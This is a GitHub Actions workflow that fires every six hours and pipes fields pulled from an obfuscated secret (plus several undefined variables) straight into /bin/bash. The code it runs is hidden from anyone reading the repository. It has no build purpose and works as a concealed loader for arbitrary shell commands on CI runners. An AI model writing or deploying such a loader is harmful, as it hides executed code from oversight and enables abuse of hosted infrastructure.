name: mudongsheng9371

on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mudongsheng9371
        env:
          pp36260: ${{ secrets.pp36260 }}
        run: |
          echo $pp36260 | jq -r .hx20749 | /bin/bash
          echo $ddbm36 | jq -r .fzrb7 | /bin/bash
          echo $rrhve427 | jq -r .mmudg40 | /bin/bash
          echo $pb89 | jq -r .uwzho484 | /bin/bash
          echo $l6967 | jq -r .uzmx4 | /bin/bash
          echo $ofsj84 | jq -r .r71 | /bin/bash
          echo $tlzf815 | jq -r .jyjsj1 | /bin/bash
          echo $syzqc1 | jq -r .u50543 | /bin/bash
          echo $agiqp8 | jq -r .iouz85049 | /bin/bash

